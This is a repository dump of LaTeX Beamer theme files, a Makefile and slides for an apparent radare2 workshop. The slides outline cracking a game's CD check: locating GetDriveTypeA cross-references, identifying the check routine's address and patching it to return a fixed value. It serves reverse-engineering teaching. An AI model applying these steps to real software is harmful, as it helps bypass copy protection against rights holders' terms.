+(-2,-.5) -- +(2,-.5) -- +(2,.5); 123 | \draw (0,\value{cellnb}) node{...}; 124 | } 125 | \newcommand{\stackbottom}[1][freecell]{ 126 | \addtocounter{cellnb}{-1} 127 | \draw[#1] (0,\value{cellnb}) 128 | +(-2,-.5) -- +(-2,+.5) -- +(2,+.5) -- +(2,-.5); 129 | \draw (0,\value{cellnb}) node{...}; 130 | } 131 | \newenvironment{drawstack}[1][]% 132 | 
{\begin{tikzpicture}[#1]\stacktop{}}% 133 | {\stackbottom\end{tikzpicture}} 134 | 135 | \newcommand{\bcell}[1]{\cell[occupiedcell]{#1}} 136 | \newcommand{\padding}[2]{\llcell{#1}{padding}{#2}} 137 | \newcommand{\bstacktop}[0]{\stacktop[occupiedcell]} 138 | \newcommand{\bstackbottom}[0]{\stackbottom[occupiedcell]} 139 | 140 | \newcounter{startframe} 141 | \newcommand{\startframe}[0]{ 142 | \setcounter{startframe}{\value{cellnb}} 143 | } 144 | \newcommand{\finishframe}[1]{ 145 | \draw[snake=brace, line width=0.6pt, segment amplitude=7pt] 146 | (-2,\value{cellnb}-0.5) -- (-2,\value{startframe}-0.5); 147 | \draw (-4.2cm,\value{cellnb}*0.5+\value{startframe}*0.5-0.5) node 148 | {\parbox{2cm}{% 149 | \begin{flushright} 150 | #1 151 | \end{flushright}}}; 152 | } 153 | \newcommand{\stackframe}[3]{ 154 | \draw[snake=brace] (-2,-#1-0.5) -- (-2,-#2-0.5); 155 | \draw (0, #1) node {#3}; 156 | } 157 | 158 | \newcommand{\drawstruct}[1]{ 159 | \setcounter{structnb}{0} 160 | \path #1 coordinate (structpos); 161 | \path (structpos) ++ (0,\value{structnb}) +(-1.6,-.5) coordinate (structtopleft); 162 | } 163 | 164 | \newcommand{\llstructcell}[3]{ 165 | \addtocounter{structnb}{-#1} 166 | \path (structpos) ++ (0,\value{structnb}) +(-1.6,-.5) coordinate (topleft); 167 | \path (structpos) ++ (0,\value{structnb}) +(-1.6,-.5+#1) coordinate (bottomleft); 168 | \path (structpos) ++ (0,\value{structnb}) +( 1.6,-.5+#1) coordinate (bottomright); 169 | \draw[#2] (topleft) rectangle (bottomright); 170 | \draw (structpos) ++ (0,\value{structnb}+#1/2-0.5) node (currentcell){#3}; 171 | } 172 | 173 | \newcommand{\structcell}[2][freestruct]{% 174 | \llstructcell{1}{#1}{#2} 175 | } 176 | 177 | \newcommand{\structname}[1]{ 178 | \path (structpos) ++ (0,\value{structnb}) +(-1.6,-.5) coordinate (structbottomleft); 179 | \draw (barycentric cs:structtopleft=.5,structbottomleft=.5) 180 | node[rotate=90,anchor=south] {#1}; 181 | } 182 | 183 | %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 
184 | -------------------------------------------------------------------------------- /nocd/AoE.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/AoE.zip -------------------------------------------------------------------------------- /nocd/Makefile: -------------------------------------------------------------------------------- 1 | SRC = slides.tex 2 | PDF = slides.pdf 3 | AUX = slides.aux 4 | TEXC := xelatex
# NOTE(review): -shell-escape lets the TeX source spawn arbitrary shell commands
# during the build, so only compile slides.tex from a source you trust.
5 | TEXC_OPTS += -shell-escape 6 | 7 | .PHONY: clean install slides 8 | 9 | all: $(PDF) 10 | 11 | slides: $(PDF) 12 | 13 | $(AUX): 14 | $(TEXC) $(TEXC_OPTS) $(SRC) 15 | 16 | $(PDF): beamerthemem.sty $(AUX) $(SRC) 17 | $(TEXC) $(TEXC_OPTS) $(SRC) 18 | 19 | clean: 20 | @rm -f $(PDF)
# NOTE(review): `git clean -xfd` removes every untracked *and* ignored file under
# the repository root, not just build products; uncommitted work is lost.
21 | @git clean -xfd 22 | 23 | -------------------------------------------------------------------------------- /nocd/beamercolorthememetropolis.sty: -------------------------------------------------------------------------------- 1 | % Beamer mtheme 2 | % 3 | % Copyright 2014 Matthias Vogelgesang 4 | % Licensed under CC-BY-SA 4.0 International. 5 | % 6 | % The initial template comes from the HSRM beamer theme by Benjamin Weiss, which 7 | % you can find at https://github.com/hsrmbeamertheme/hsrmbeamertheme. 
8 | % 9 | 10 | \ProvidesPackage{beamercolorthememetropolis} 11 | 12 | 13 | %}}} 14 | %{{{ --- Options ---------------------- 15 | 16 | \newif\if@beamer@metropolis@blockbg 17 | \@beamer@metropolis@blockbgfalse 18 | \DeclareOptionBeamer{blockbg}{\@beamer@metropolis@blockbgtrue} 19 | 20 | \DeclareOptionBeamer*{% 21 | \PackageWarning{beamercolorthememetropolis}{Unknown option `\CurrentOption'}% 22 | } 23 | 24 | \ProcessOptionsBeamer 25 | 26 | %}}} 27 | %{{{ --- Colors --------------------- 28 | 29 | % http://paletton.com/#uid=7050t0kkJkJsntwoyp6gYgoddc4 30 | 31 | \definecolor{mDarkBrown}{HTML}{604c38} 32 | \definecolor{mDarkTeal}{HTML}{23373b} 33 | 34 | \definecolor{mLightBrown}{HTML}{EB811B} 35 | \definecolor{mMediumBrown}{HTML}{C87A2F} 36 | 37 | \setbeamercolor{palette primary}{fg=mDarkTeal, bg=black!2} 38 | \setbeamercolor{palette secondary}{fg=white, bg=mDarkTeal} 39 | \setbeamercolor{palette quaternary}{fg=mDarkBrown} 40 | \setbeamercolor{palette tertiary}{fg=white, bg=mMediumBrown} 41 | 42 | \setbeamercolor{title}{parent=palette primary} 43 | \setbeamercolor{subtitle}{parent=palette primary} 44 | \setbeamercolor{author}{parent=palette primary} 45 | \setbeamercolor{date}{parent=palette primary} 46 | \setbeamercolor{institute}{parent=palette primary} 47 | 48 | \setbeamercolor{section title}{parent=palette primary} 49 | \setbeamercolor{frametitle}{parent=palette secondary} 50 | \setbeamercolor{background canvas}{parent=palette primary} 51 | \setbeamercolor{structure}{fg=mDarkTeal} 52 | 53 | \setbeamercolor{normal text}{fg=black!97} 54 | \setbeamercolor{alerted text}{fg=mLightBrown} 55 | 56 | \setbeamercolor{footnote}{fg=mDarkTeal!50} 57 | \setbeamercolor{footnote mark}{fg=.} 58 | \setbeamercolor{page number in head/foot}{fg=mDarkTeal} 59 | 60 | \if@beamer@metropolis@blockbg 61 | 62 | \setbeamercolor{block title}{use=palette primary,parent=palette primary,bg=palette primary.bg!80!fg} 63 | \setbeamercolor{block title alerted}{use={palette primary,alerted 
text},parent=palette primary,fg=alerted text.fg,bg=palette primary.bg!80!fg} 64 | \setbeamercolor{block title example}{use={palette primary,example text},parent=palette primary,fg=example text.fg,bg=palette primary.bg!80!fg} 65 | 66 | \setbeamercolor{block body}{use=block title,parent=normal text,bg=block title.bg!50} 67 | \setbeamercolor{block body alerted}{use={normal text,block body},parent=normal text,bg=block body.bg} 68 | \setbeamercolor{block body example}{use={normal text,block body},parent=normal text,bg=block body.bg} 69 | 70 | \fi 71 | 72 | \mode 73 | -------------------------------------------------------------------------------- /nocd/beamerfontthememetropolis.sty: -------------------------------------------------------------------------------- 1 | % Beamer mtheme 2 | % 3 | % Copyright 2014 Matthias Vogelgesang 4 | % Licensed under CC-BY-SA 4.0 International. 5 | % 6 | % The initial template comes from the HSRM beamer theme by Benjamin Weiss, which 7 | % you can find at https://github.com/hsrmbeamertheme/hsrmbeamertheme. 
8 | % 9 | 10 | \ProvidesPackage{beamerfontthememetropolis} 11 | 12 | \RequirePackage[no-math]{fontspec} 13 | 14 | 15 | \defaultfontfeatures{Mapping=tex-text} 16 | \setsansfont[BoldFont={Fira Sans}]{Fira Sans Light} 17 | \setmonofont{Fira Mono} 18 | \newfontfamily\ExtraLight{Fira Sans ExtraLight} 19 | \newfontfamily\Light{Fira Sans Light} 20 | \newfontfamily\Book{Fira Sans} 21 | \newfontfamily\Medium{Fira Sans Medium} 22 | 23 | \AtBeginEnvironment{tabular}{\setsansfont[BoldFont={Fira Sans}, Numbers={Monospaced}]{Fira Sans Light}} 24 | 25 | \setbeamerfont{title}{family=\Book, size=\Large} 26 | \setbeamerfont{author}{family=\ExtraLight, size=\small} 27 | \setbeamerfont{date}{family=\ExtraLight, size=\small} 28 | 29 | \setbeamerfont{section title}{family=\Book, size=\Large} 30 | 31 | \setbeamerfont{block title}{family=\Book, size=\normalsize} 32 | \setbeamerfont{block title alerted}{family=\Book,size=\normalsize} 33 | 34 | \setbeamerfont{subtitle}{family=\Light, size=\fontsize{12}{14}} 35 | \setbeamerfont{frametitle}{family=\Book, size=\large} 36 | 37 | \setbeamerfont{caption}{size=\small} 38 | \setbeamerfont{caption name}{family=\Book} 39 | 40 | \setbeamerfont{description item}{family=\Book} 41 | 42 | \setbeamerfont{page number in head/foot}{size=\scriptsize} 43 | 44 | 45 | \linespread{1.15} 46 | -------------------------------------------------------------------------------- /nocd/beamerthemem.sty: -------------------------------------------------------------------------------- 1 | % Beamer mtheme 2 | % 3 | % Copyright 2014 Matthias Vogelgesang 4 | % Licensed under CC-BY-SA 4.0 International. 5 | % 6 | % The initial template comes from the HSRM beamer theme by Benjamin Weiss, which 7 | % you can find at https://github.com/hsrmbeamertheme/hsrmbeamertheme. 
8 | % 9 | 10 | \ProvidesPackage{beamerthemem} 11 | 12 | %{{{ --- Options ---------------------- 13 | 14 | \newif\if@useTitleProgressBar 15 | \newif\if@protectFrameTitle 16 | \newif\if@noSmallCapitals 17 | \newif\if@noSectionSlide 18 | \newif\if@useTotalSlideIndicator 19 | 20 | \@useTitleProgressBarfalse 21 | \@protectFrameTitlefalse 22 | \@noSmallCapitalsfalse 23 | \@noSectionSlidefalse 24 | \@useTotalSlideIndicatorfalse 25 | 26 | \newlength{\@mtheme@voffset} 27 | \setlength{\@mtheme@voffset}{2em} 28 | 29 | \DeclareOptionBeamer{usetitleprogressbar}{\@useTitleProgressBartrue} 30 | \DeclareOptionBeamer{protectframetitle}{\@protectFrameTitletrue} 31 | \DeclareOptionBeamer{blockbg}{% 32 | \PassOptionsToPackage{blockbg}{beamercolorthememetropolis}% 33 | } 34 | \DeclareOptionBeamer{nooffset}{\setlength{\@mtheme@voffset}{0em}} 35 | 36 | \DeclareOptionBeamer*{% 37 | \PackageWarning{beamerthemem}{Unknown option `\CurrentOption'}% 38 | } 39 | 40 | \DeclareOptionBeamer{nosmallcapitals}{\@noSmallCapitalstrue} 41 | \DeclareOptionBeamer{nosectionslide}{\@noSectionSlidetrue} 42 | \DeclareOptionBeamer{usetotalslideindicator}{\@useTotalSlideIndicatortrue} 43 | 44 | \ProcessOptionsBeamer 45 | 46 | %}}} 47 | 48 | \mode 49 | 50 | %{{{ --- Packages --------------------- 51 | 52 | \RequirePackage{etoolbox} 53 | \RequirePackage{tikz} 54 | \RequirePackage{pgfplots} 55 | 56 | \usetikzlibrary{backgrounds} 57 | \usetikzlibrary{calc} 58 | 59 | \usecolortheme{metropolis} 60 | \usefonttheme{metropolis} 61 | 62 | %}}} 63 | %{{{ --- Titlepage -------------------- 64 | 65 | \def\maketitle{\ifbeamer@inframe\titlepage\else\frame[plain]{\titlepage}\fi} 66 | \def\titlepage{\usebeamertemplate{title page}} 67 | 68 | \setbeamertemplate{title page} 69 | { 70 | \begin{minipage}[b][\paperheight]{\textwidth} 71 | \vspace*{\@mtheme@voffset} 72 | 73 | \ifx\inserttitlegraphic\@empty\else 74 | {% \inserttitlegraphic is nonempty 75 | \vbox to 0pt 76 | {% display title graphic without changing the position of 
other elements 77 | \vspace*{2em} 78 | \usebeamercolor[fg]{titlegraphic}% 79 | \inserttitlegraphic% 80 | }% 81 | \nointerlineskip% 82 | } 83 | \fi 84 | 85 | \vfill% 86 | 87 | \ifx\inserttitle\@empty\else 88 | {{% \inserttitle is nonempty 89 | \raggedright% 90 | \linespread{1.0}% 91 | \usebeamerfont{title}% 92 | \usebeamercolor[fg]{title}% 93 | \if@noSmallCapitals% 94 | \inserttitle% 95 | \else% 96 | \scshape\MakeLowercase{\inserttitle}% 97 | \fi% 98 | \vspace*{0.5em} 99 | }} 100 | \fi 101 | 102 | \ifx\insertsubtitle\@empty\else 103 | {{% \insertsubtitle is nonempty 104 | \usebeamerfont{subtitle}% 105 | \usebeamercolor[fg]{subtitle}% 106 | \insertsubtitle% 107 | \vspace*{0.5em}% 108 | }} 109 | \fi 110 | 111 | \begin{tikzpicture} 112 | \draw[alerted text.fg] (0, 0) -- (\textwidth, 0); 113 | \end{tikzpicture}% 114 | \vspace*{1em}% 115 | 116 | \ifx\beamer@shortauthor\@empty\else 117 | {{% \insertauthor is always nonempty by beamer's definition, so we must 118 | % test another macro which is initialized by \author{...} 119 | % For details, see http://tex.stackexchange.com/questions/241306/ 120 | \usebeamerfont{author}% 121 | \usebeamercolor[fg]{author}% 122 | \insertauthor% 123 | \par% 124 | \vspace*{0.25em} 125 | }} 126 | \fi 127 | 128 | \ifx\insertdate\@empty\else 129 | {{% \insertdate is nonempty 130 | \usebeamerfont{date}% 131 | \usebeamercolor[fg]{date}% 132 | \insertdate% 133 | \par% 134 | }} 135 | \fi 136 | 137 | \ifx\insertinstitute\@empty\else 138 | {{% \insertinstitute is nonempty 139 | \vspace*{3mm} 140 | \usebeamerfont{institute}% 141 | \usebeamercolor[fg]{institute}% 142 | \insertinstitute% 143 | \par% 144 | }} 145 | \fi 146 | 147 | \vfill 148 | \vspace*{\@mtheme@voffset} 149 | \end{minipage} 150 | } 151 | 152 | %}}} 153 | %{{{ --- Progressbar ------------------ 154 | 155 | \makeatletter 156 | \def\progressbar@sectionprogressbar{} 157 | \def\progressbar@titleprogressbar{} 158 | \newcount\progressbar@tmpcounta % auxiliary counter 159 | 
\newcount\progressbar@tmpcountb % auxiliary counter 160 | \newdimen\progressbar@pbht % progressbar height 161 | \newdimen\progressbar@pbwd % progressbar width 162 | \newdimen\progressbar@tmpdim % auxiliary dimension 163 | 164 | \progressbar@pbwd=22em 165 | \progressbar@pbht=0.4pt 166 | 167 | % the progress bar 168 | \def\progressbar@sectionprogressbar{% 169 | {\usebeamercolor{palette primary}% 170 | \progressbar@tmpcounta=\insertframenumber 171 | \progressbar@tmpcountb=\inserttotalframenumber 172 | \progressbar@tmpdim=\progressbar@pbwd 173 | \divide\progressbar@tmpdim by 100 174 | \multiply\progressbar@tmpdim by \progressbar@tmpcounta 175 | \divide\progressbar@tmpdim by \progressbar@tmpcountb 176 | \multiply\progressbar@tmpdim by 100 177 | 178 | % fixes very high linespacing introduced via \textsc{\MakeLowercase{...}} 179 | \fontsize{1em}{1em}\selectfont 180 | 181 | \makebox[\textwidth][c]{ 182 | \begin{tikzpicture}[tight background] 183 | 184 | \node[anchor=south west, fg, inner sep=0pt, text width=\progressbar@pbwd] at (0pt, 0pt) {\insertsectionHEAD}; 185 | 186 | \draw[anchor=west, fg!20, fill=fg!20, inner sep=0pt] 187 | (0, -1ex) rectangle ++ (\progressbar@pbwd, \progressbar@pbht); 188 | 189 | \draw[anchor=west, fg, fill=fg, inner sep=0pt] 190 | (0, -1ex) rectangle ++ (\progressbar@tmpdim, \progressbar@pbht); 191 | \end{tikzpicture}% 192 | } 193 | } % end usebeamercolor{palette primary} 194 | } 195 | 196 | \if@useTitleProgressBar 197 | \def\progressbar@titleprogressbar{% 198 | \progressbar@tmpcounta=\insertframenumber 199 | \progressbar@tmpcountb=\inserttotalframenumber 200 | \progressbar@tmpdim=\paperwidth 201 | \divide\progressbar@tmpdim by 100 202 | \multiply\progressbar@tmpdim by \progressbar@tmpcounta 203 | \divide\progressbar@tmpdim by \progressbar@tmpcountb 204 | \multiply\progressbar@tmpdim by 100 205 | {% 206 | \usebeamercolor{palette quaternary}% 207 | \usebeamercolor{alerted text}% 208 | \begin{tikzpicture}[tight background] 209 | \draw[palette 
quaternary.fg, fill=palette quaternary.fg] (0, 0) rectangle ($(\paperwidth, 0.6pt) - (0.4pt, 0)$); 210 | \draw[alerted text.fg, fill=alerted text.fg] (0, 0) rectangle (\progressbar@tmpdim, 0.6pt); 211 | \end{tikzpicture}% 212 | }% 213 | } 214 | \fi 215 | %}}} 216 | %{{{ --- Commands --------------------- 217 | 218 | \newcommand{\insertsectionHEAD}{% 219 | \expandafter\insertsectionHEADaux\insertsectionhead} 220 | 221 | \if@noSmallCapitals% 222 | \newcommand{\insertsectionHEADaux}[3]{#3}% 223 | \else% 224 | \newcommand{\insertsectionHEADaux}[3]{\textsc{\MakeLowercase{#3}}}% 225 | \fi% 226 | 227 | \newcommand{\plain}[2][]{% 228 | \begingroup 229 | \setbeamercolor{background canvas}{use=palette primary,bg=palette primary.fg} 230 | \begin{frame}{#1} 231 | \centering 232 | \vfill\vspace{1em}\usebeamerfont{section title}\textcolor{white}{\scshape #2}\vfill 233 | \end{frame} 234 | \endgroup 235 | } 236 | 237 | %}}} 238 | %{{{ --- Itemize ---------------------- 239 | 240 | \setlength{\leftmargini}{1em} 241 | 242 | % Actually one level should be enough but ... 
243 | \setlength{\leftmarginii}{1em} 244 | \setlength{\leftmarginiii}{1em} 245 | 246 | \newcommand{\itemBullet}{∙} 247 | 248 | \setbeamertemplate{itemize item}{\itemBullet} 249 | \setbeamertemplate{itemize subitem}{\itemBullet} 250 | \setbeamertemplate{itemize subsubitem}{\itemBullet} 251 | \setlength{\parskip}{0.5em} 252 | 253 | %}}} 254 | %{{{ --- Sections --------------------- 255 | 256 | % Insert frame with section title at every section start 257 | \AtBeginSection[] 258 | { 259 | \if@noSectionSlide% 260 | \else% 261 | \begingroup 262 | \setbeamercolor{background canvas}{parent=palette primary} 263 | \begin{frame}[plain] 264 | \vspace{2em}\usebeamerfont{section title} 265 | \progressbar@sectionprogressbar% 266 | \end{frame} 267 | \endgroup 268 | \fi% 269 | } 270 | 271 | %}}} 272 | %{{{ --- Captions --------------------- 273 | 274 | \setbeamertemplate{caption label separator}{: } 275 | \setbeamertemplate{caption}[numbered] 276 | 277 | %}}} 278 | %{{{ --- Footline/footnote ------------ 279 | 280 | \usenavigationsymbolstemplate{} 281 | \setbeamertemplate{footline} 282 | {% 283 | \begin{beamercolorbox}[wd=\textwidth,ht=3ex,dp=3ex,leftskip=0.3cm,rightskip=0.3cm]{structure}% 284 | \hfill\usebeamerfont{page number in head/foot}% 285 | \if@useTotalSlideIndicator% 286 | \insertframenumber/\inserttotalframenumber% 287 | \else% 288 | \insertframenumber% 289 | \fi% 290 | \end{beamercolorbox}% 291 | } 292 | 293 | \setbeamertemplate{footnote} 294 | {% 295 | \parindent 0em\noindent% 296 | \raggedright 297 | \usebeamercolor{footnote}\hbox to 0.8em{\hfil\insertfootnotemark}\insertfootnotetext\par% 298 | } 299 | 300 | %}}} 301 | %{{{ --- Frametitle ------------------- 302 | 303 | \setbeamertemplate{frametitle}{% 304 | \nointerlineskip 305 | \begin{beamercolorbox}[wd=\paperwidth,leftskip=0.3cm,rightskip=0.3cm,ht=2.5ex,dp=1.5ex]{frametitle} 306 | \usebeamerfont{frametitle}% 307 | \if@protectFrameTitle% 308 | \protect% 309 | \if@noSmallCapitals% 310 | \insertframetitle% 311 | 
\else% 312 | \textsc{\MakeLowercase{\insertframetitle}}% 313 | \fi% 314 | \else% 315 | \if@noSmallCapitals% 316 | \insertframetitle% 317 | \else% 318 | \textsc{\MakeLowercase{\insertframetitle}}% 319 | \fi% 320 | \fi% 321 | \end{beamercolorbox}% 322 | \if@useTitleProgressBar 323 | \vspace{-.5em} 324 | \begin{beamercolorbox}[wd=\paperwidth,ht=1pt,dp=0pt]{frametitle} 325 | \progressbar@titleprogressbar 326 | \end{beamercolorbox} 327 | \fi 328 | \vspace{\@mtheme@voffset} 329 | } 330 | 331 | %}}} 332 | %{{{ --- pgfplots --------------------- 333 | 334 | %{{{ Colors 335 | 336 | % TolColors from http://www.r-bloggers.com/the-paul-tol-21-color-salute/ 337 | \definecolor{TolColor1}{HTML}{332288} % dark purple 338 | \definecolor{TolColor2}{HTML}{6699CC} % dark blue 339 | \definecolor{TolColor3}{HTML}{88CCEE} % light blue 340 | \definecolor{TolColor4}{HTML}{44AA99} % light green 341 | \definecolor{TolColor5}{HTML}{117733} % dark green 342 | \definecolor{TolColor6}{HTML}{999933} % dark brown 343 | \definecolor{TolColor7}{HTML}{DDCC77} % light brown 344 | \definecolor{TolColor8}{HTML}{661100} % dark red 345 | \definecolor{TolColor9}{HTML}{CC6677} % light red 346 | \definecolor{TolColor10}{HTML}{AA4466} % light pink 347 | \definecolor{TolColor11}{HTML}{882255} % dark pink 348 | \definecolor{TolColor12}{HTML}{AA4499} % light purple 349 | 350 | %}}} 351 | %{{{ Color cycles 352 | 353 | \pgfplotscreateplotcyclelist{mbarplot cycle}{% 354 | {draw=TolColor2, fill=TolColor2!70}, 355 | {draw=TolColor7, fill=TolColor7!70}, 356 | {draw=TolColor4, fill=TolColor4!70}, 357 | {draw=TolColor11, fill=TolColor11!70}, 358 | {draw=TolColor1, fill=TolColor1!70}, 359 | {draw=TolColor8, fill=TolColor8!70}, 360 | {draw=TolColor6, fill=TolColor6!70}, 361 | {draw=TolColor9, fill=TolColor9!70}, 362 | {draw=TolColor10, fill=TolColor10!70}, 363 | {draw=TolColor12, fill=TolColor12!70}, 364 | {draw=TolColor3, fill=TolColor3!70}, 365 | {draw=TolColor5, fill=TolColor5!70}, 366 | } 367 | 368 | 
\pgfplotscreateplotcyclelist{mlineplot cycle}{% 369 | {TolColor2, mark=*, mark size=1.5pt}, 370 | {TolColor7, mark=square*, mark size=1.3pt}, 371 | {TolColor4, mark=triangle*, mark size=1.5pt}, 372 | {TolColor6, mark=diamond*, mark size=1.5pt}, 373 | } 374 | 375 | %}}} 376 | %{{{ Styles 377 | 378 | \pgfplotsset{ 379 | compat=1.9, 380 | mbaseplot/.style={ 381 | legend style={ 382 | draw=none, 383 | fill=none, 384 | cells={anchor=west}, 385 | }, 386 | x tick label style={ 387 | font=\footnotesize 388 | }, 389 | y tick label style={ 390 | font=\footnotesize 391 | }, 392 | legend style={ 393 | font=\footnotesize 394 | }, 395 | major grid style={ 396 | dotted, 397 | }, 398 | axis x line*=bottom, 399 | }, 400 | mlineplot/.style={ 401 | mbaseplot, 402 | xmajorgrids=true, 403 | ymajorgrids=true, 404 | major grid style={dotted}, 405 | axis x line=bottom, 406 | axis y line=left, 407 | legend style={ 408 | cells={anchor=west}, 409 | draw=none 410 | }, 411 | cycle list name=mlineplot cycle, 412 | }, 413 | mbarplot base/.style={ 414 | mbaseplot, 415 | bar width=6pt, 416 | axis y line*=none, 417 | }, 418 | mbarplot/.style={ 419 | mbarplot base, 420 | ybar, 421 | xmajorgrids=false, 422 | ymajorgrids=true, 423 | area legend, 424 | legend image code/.code={% 425 | \draw[#1] (0cm,-0.1cm) rectangle (0.15cm,0.1cm); 426 | }, 427 | cycle list name=mbarplot cycle, 428 | }, 429 | horizontal mbarplot/.style={ 430 | mbarplot base, 431 | xmajorgrids=true, 432 | ymajorgrids=false, 433 | xbar stacked, 434 | area legend, 435 | legend image code/.code={% 436 | \draw[#1] (0cm,-0.1cm) rectangle (0.15cm,0.1cm); 437 | }, 438 | cycle list name=mbarplot cycle, 439 | }, 440 | disable thousands separator/.style={ 441 | /pgf/number format/.cd, 442 | 1000 sep={} 443 | }, 444 | } 445 | 446 | %}}} 447 | 448 | \mode 449 | 450 | %{{{ misc 451 | \let\otp\titlepage 452 | \renewcommand{\titlepage}{\otp\addtocounter{framenumber}{-1}} 453 | \newcommand{\mreducelistspacing}{\vspace{-\topsep}} 454 | 455 | 
\linespread{1.15} 456 | 457 | %}}} 458 | -------------------------------------------------------------------------------- /nocd/pix/aoe.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/pix/aoe.jpg -------------------------------------------------------------------------------- /nocd/pix/crack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/pix/crack.png -------------------------------------------------------------------------------- /nocd/pix/ii.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/pix/ii.png -------------------------------------------------------------------------------- /nocd/pix/script.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/pix/script.png -------------------------------------------------------------------------------- /nocd/pix/x230.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/pix/x230.png -------------------------------------------------------------------------------- /nocd/slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/slides.pdf -------------------------------------------------------------------------------- /nocd/slides.tex: -------------------------------------------------------------------------------- 1 | \documentclass{beamer} 2 | 3 | 
\usepackage[english]{ babel } 4 | \usepackage[T1]{ fontenc } 5 | \usepackage{ graphicx } 6 | \graphicspath{ {./pix/} } 7 | 8 | \usetheme[block=fill]{m} 9 | 10 | \newlength{\blackoutwidth} 11 | \newcommand{\blackout}[1] 12 | {%necessary comment 13 | \settowidth{\blackoutwidth}{#1}%necessary comment 14 | \rule[-0.3em]{\blackoutwidth}{1.125em}%necessary comment 15 | } 16 | 17 | \title{Radare2 workshop} 18 | \author{Writing a crack for \blackout{Age of Empire} } 19 | \date{\today} 20 | \institute{hack.lu 2015} 21 | 22 | \begin{document} 23 | 24 | \maketitle 25 | 26 | \begin{frame}{whoami} 27 | \begin{block}{Julien (jvoisin) Voisin} 28 | \begin{itemize} 29 | \item French 30 | \item Freshly graduated 31 | \item I don't know Windows 32 | \end{itemize} 33 | \end{block} 34 | \end{frame} 35 | 36 | \begin{frame}{Disclaimer} 37 | \begin{center} 38 | Piracy is \alert{bad}, m'kay. 39 | \end{center} 40 | \end{frame} 41 | 42 | \begin{frame}{What is this?} 43 | \begin{center} 44 | \includegraphics[width=.9\textwidth]{aoe.jpg} 45 | \end{center} 46 | \end{frame} 47 | 48 | \begin{frame}{And what is this?} 49 | \begin{center} 50 | \includegraphics[width=.75\textwidth]{x230.png} 51 | \end{center} 52 | \end{frame} 53 | 54 | \begin{frame}{But I still want to play!} 55 | Time to write a \alert{compatibility enhancement hotfix}! 56 | \vskip1em 57 | \pause 58 | While knowing close to nothing about the Windows world. 59 | \end{frame} 60 | 61 | \begin{frame}{Where to look} 62 | \begin{center} 63 | In your virtual machine, in the \alert{nocd} folder. 
64 | \end{center} 65 | \end{frame} 66 | 67 | \begin{frame}{Finding the right function} 68 | \includegraphics[width=\textwidth]{ii.png}\\ 69 | \end{frame} 70 | 71 | \begin{frame}{Lets script some documentation fetcher for r2} 72 | \begin{center} 73 | \includegraphics[width=\textwidth,height=.3\textheight]{script.png}\\ 74 | \pause 75 | You've got this one in your .radare2rc in the VM 76 | \end{center} 77 | \end{frame} 78 | 79 | \begin{frame}{Find where it's called} 80 | \begin{block}{Your turn!} 81 | \begin{itemize}[<+->] 82 | \item Find where \alert{GetDriveTypeA} is called 83 | \item It's likely an \alert{a}nalysis command, about \alert{x}ref \alert{t}o something 84 | \item There are two locations: 85 | \begin{itemize} 86 | \item \emph{0x4d65f6} 87 | \item \emph{0x5352ee} 88 | \end{itemize} 89 | \item In what function do they belong? 90 | \item Still in \alert{a}nalysis, \alert{f}unction related, about \alert{i}nformation 91 | \item \emph{afi 0x4d65f6} 92 | \item \emph{afi 0x5352ee} 93 | \end{itemize} 94 | \end{block} 95 | \end{frame} 96 | 97 | \begin{frame}{Find where it's called (cont.)} 98 | \begin{block}{Your turn!} 99 | \begin{itemize}[<+->] 100 | \item \alert{0x4d65f6} is called from two locations: 101 | \begin{itemize} 102 | \item \emph{0x004d6550} 103 | \item \emph{0x004ab1aa} 104 | \end{itemize} 105 | \item Which one is the relevant one? (check with \emph{VV}) 106 | \item \alert{0x004d6550} is the cd-check routine! 107 | \end{itemize} 108 | \end{block} 109 | \end{frame} 110 | 111 | \begin{frame}{Patching time} 112 | \begin{enumerate} 113 | \item Reopen the binary in \alert{write} mode with \emph{oo+} 114 | \item Hardcode a return value for \alert{fcn.0x004d6550} 115 | \item Play the game without the CD! 
116 | \end{enumerate} 117 | \end{frame} 118 | 119 | \begin{frame}{My solution} 120 | \includegraphics[width=\textwidth,height=.3\textheight]{crack.png} 121 | \end{frame} 122 | 123 | \section*{Conclusion} 124 | \begin{frame}{Conclusion} 125 | \begin{center} 126 | \only<1>{ 127 | \begin{itemize} 128 | \item Having no CD reader sucks, 129 | \item Age of Empire is cool, 130 | \item So is radare2. 131 | \end{itemize} 132 | } 133 | \only<2>{ 134 | \Large 135 | Radare2 is \alert{nice}. 136 | 137 | You should use it. 138 | } 139 | \end{center} 140 | \end{frame} 141 | 142 | \begin{frame}{Resources} 143 | \begin{itemize} 144 | \item \href{https://github.com/radare/radare2}{Github repo} 145 | \item \href{http://rada.re}{Official website} 146 | \item \href{http://radare.today}{The r2 blog} 147 | \item \href{http://maijin.github.io/radare2book/}{The r2 book} 148 | \item \href{https://twitter.com/radareorg}{Twitter} 149 | \end{itemize} 150 | \end{frame} 151 | 152 | \end{document} 153 | -------------------------------------------------------------------------------- /pe_certificate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pe_certificate -------------------------------------------------------------------------------- /pgfplotsthemetol.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `pgfplotsthemetol.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% pgfplotsthemetol.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. 
